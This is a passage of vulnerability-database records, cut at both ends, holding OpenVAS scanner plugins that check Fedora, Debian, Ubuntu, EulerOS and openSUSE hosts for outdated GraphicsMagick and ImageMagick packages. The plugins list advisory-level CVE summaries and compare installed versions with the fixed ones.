"2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874085", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874085", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_bfb9835edd_GraphicsMagick_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for GraphicsMagick FEDORA-2018-bfb9835edd\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874085\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-01 07:57:22 +0100 (Thu, 01 Feb 2018)\");\n script_cve_id(\"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2017-17783\",\n \"CVE-2017-17782\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-13147\",\n \"CVE-2017-11643\", \"CVE-2017-11641\", \"CVE-2017-11636\", \"CVE-2017-11637\",\n \"CVE-2017-11140\", \"CVE-2017-11139\", \"CVE-2017-11102\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n 
script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for GraphicsMagick FEDORA-2018-bfb9835edd\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'GraphicsMagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"GraphicsMagick on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-bfb9835edd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ISKX4WLRTYSRACWKG6AHO35A6HAVWHBB\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.28~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:06:55", "description": "CVE-2017-13776\nCVE-2017-13777\ndenial of service issue in ReadXBMImage()\n\nCVE-2017-12935\nThe ReadMNGImage function in coders/png.c mishandles large MNG\nimages, leading to an invalid memory read in the\nSetImageColorCallBack function in 
magick/image.c.\n\nCVE-2017-12936\nThe ReadWMFImage function in coders/wmf.c has a use-after-free\nissue for data associated with exception reporting.\n\nCVE-2017-12937\nThe ReadSUNImage function in coders/sun.c has a colormap\nheap-based buffer over-read.\n\nCVE-2017-13063\nCVE-2017-13064\nheap-based buffer overflow vulnerability in the function\nGetStyleTokens in coders/svg.c\n\nCVE-2017-13065\nNULL pointer dereference vulnerability in the function\nSVGStartElement in coders/svg.c", "cvss3": {}, "published": "2018-02-07T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for graphicsmagick (DLA-1082-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-13777", "CVE-2017-12936", "CVE-2017-13776", "CVE-2017-13065", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-13064"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891082", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891082\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13776\", \"CVE-2017-13777\");\n script_name(\"Debian LTS: Security Advisory for graphicsmagick (DLA-1082-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/08/msg00034.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"graphicsmagick on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u9.\n\nWe recommend that you upgrade your graphicsmagick packages.\");\n\n script_tag(name:\"summary\", value:\"CVE-2017-13776\nCVE-2017-13777\ndenial of service issue in ReadXBMImage()\n\nCVE-2017-12935\nThe ReadMNGImage function in coders/png.c mishandles large 
MNG\nimages, leading to an invalid memory read in the\nSetImageColorCallBack function in magick/image.c.\n\nCVE-2017-12936\nThe ReadWMFImage function in coders/wmf.c has a use-after-free\nissue for data associated with exception reporting.\n\nCVE-2017-12937\nThe ReadSUNImage function in coders/sun.c has a colormap\nheap-based buffer over-read.\n\nCVE-2017-13063\nCVE-2017-13064\nheap-based buffer overflow vulnerability in the function\nGetStyleTokens in coders/svg.c\n\nCVE-2017-13065\nNULL pointer dereference vulnerability in the function\nSVGStartElement in coders/svg.c\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-dbg\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-imagemagick-compat\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-libmagick-dev-compat\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphics-magick-perl\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++1-dev\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++3\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick1-dev\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick3\", ver:\"1.3.16-1.1+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n 
security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-19T15:01:01", "description": "The remote host is missing an update for the 'graphicsmagick'\n package(s) announced via the USN-4222-1 advisory.", "cvss3": {}, "published": "2019-12-17T00:00:00", "type": "openvas", "title": "Ubuntu Update for graphicsmagick USN-4222-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-11641", "CVE-2017-13777", "CVE-2017-13775", "CVE-2017-13737", "CVE-2017-12936", "CVE-2017-13776", "CVE-2017-11638", "CVE-2017-11643", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-11642", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-13064"], "modified": "2019-12-18T00:00:00", "id": "OPENVAS:1361412562310844278", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844278", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844278\");\n script_version(\"2019-12-18T09:57:42+0000\");\n script_cve_id(\"CVE-2017-11638\", \"CVE-2017-11641\", \"CVE-2017-11642\", \"CVE-2017-11643\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-13776\", \"CVE-2017-13777\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-18 09:57:42 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-12-17 03:00:55 +0000 (Tue, 17 Dec 2019)\");\n script_name(\"Ubuntu Update for graphicsmagick USN-4222-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"4222-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-December/005249.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'graphicsmagick'\n package(s) announced via the USN-4222-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that GraphicsMagick incorrectly handled certain image files.\nAn attacker 
could possibly use this issue to cause a denial of service or other\nunspecified impact.\");\n\n script_tag(name:\"affected\", value:\"'graphicsmagick' package(s) on Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.23-1ubuntu0.3\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"-q16-12\", ver:\"1.3.23-1ubuntu0.3\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick-q16-3\", ver:\"1.3.23-1ubuntu0.3\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:36", "description": "Several vulnerabilities have been discovered in GraphicsMagick, a set of\ncommand-line applications to manipulate image files, which could result\nin denial of service or the execution of arbitrary code if malformed\nimage files are processed.", "cvss3": {}, "published": "2018-10-16T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4321-1 (graphicsmagick - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-17783", "CVE-2017-17915", "CVE-2017-10794", "CVE-2017-15277", "CVE-2017-14997", "CVE-2017-17913", "CVE-2017-11641", "CVE-2017-13777", "CVE-2017-10799", "CVE-2017-13775", "CVE-2018-6799", "CVE-2017-17502", "CVE-2017-13737", "CVE-2017-11722", "CVE-2017-18220", 
"CVE-2017-12936", "CVE-2017-17498", "CVE-2017-18229", "CVE-2017-13776", "CVE-2017-14314", "CVE-2017-11636", "CVE-2017-11638", "CVE-2017-17782", "CVE-2017-16352", "CVE-2017-17503", "CVE-2017-18231", "CVE-2017-11102", "CVE-2017-18230", "CVE-2017-14994", "CVE-2017-16547", "CVE-2017-15238", "CVE-2017-11643", "CVE-2017-11403", "CVE-2017-15930", "CVE-2017-18219", "CVE-2017-11139", "CVE-2017-17500", "CVE-2017-14504", "CVE-2017-10800", "CVE-2018-9018", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-11642", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-14733", "CVE-2017-11140", "CVE-2017-16545", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-17501", "CVE-2018-5685", "CVE-2017-13064", "CVE-2017-17912", "CVE-2017-11637"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704321", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704321", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4321-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704321\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-10794\", \"CVE-2017-10799\", \"CVE-2017-10800\", \"CVE-2017-11102\", \"CVE-2017-11139\",\n \"CVE-2017-11140\", \"CVE-2017-11403\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11638\",\n \"CVE-2017-11641\", \"CVE-2017-11642\", \"CVE-2017-11643\", \"CVE-2017-11722\", \"CVE-2017-12935\",\n \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\",\n \"CVE-2017-13134\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-13776\", \"CVE-2017-13777\",\n \"CVE-2017-14314\", \"CVE-2017-14504\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\",\n \"CVE-2017-15238\", \"CVE-2017-15277\", \"CVE-2017-15930\", \"CVE-2017-16352\", \"CVE-2017-16353\",\n \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\",\n \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\",\n \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2017-18219\", \"CVE-2017-18220\",\n \"CVE-2017-18229\", \"CVE-2017-18230\", \"CVE-2017-18231\", \"CVE-2018-5685\", \"CVE-2018-6799\",\n \"CVE-2018-9018\");\n script_name(\"Debian Security Advisory DSA 4321-1 (graphicsmagick - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-16 00:00:00 +0200 (Tue, 16 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4321.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"graphicsmagick on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 1.3.30+hg15796-1~deb9u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/graphicsmagick\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in GraphicsMagick, a set of\ncommand-line applications to manipulate image files, which could result\nin denial of service or the execution of arbitrary code if malformed\nimage files are processed.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-dbg\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-imagemagick-compat\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-libmagick-dev-compat\", ver:\"1.3.30+hg15796-1~deb9u1\", 
rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphics-magick-perl\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++-q16-12\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++1-dev\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick-q16-3\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick1-dev\", ver:\"1.3.30+hg15796-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:37:57", "description": "The remote host is missing an update for the Huawei EulerOS\n 'ImageMagick' package(s) announced via the EulerOS-SA-2016-1021 advisory.", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ImageMagick (EulerOS-SA-2016-1021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220161021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220161021", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but 
WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2016.1021\");\n script_version(\"2020-01-23T10:38:28+0000\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:38:28 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:38:28 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ImageMagick (EulerOS-SA-2016-1021)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2016-1021\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1021\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ImageMagick' package(s) announced via the EulerOS-SA-2016-1021 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that ImageMagick did not properly sanitize certain input before 
passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.(CVE-2016-3714)\n\nIt was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\nA server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. 
(CVE-2016-3718)\");\n\n script_tag(name:\"affected\", value:\"'ImageMagick' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:19", "description": "The remote host is missing an update for the 'ImageMagick'\n package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2016-05-08T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for ImageMagick (openSUSE-SU-2016:1266-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851305", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under 
the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851305\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:13 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\",\n \"CVE-2016-3718\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory 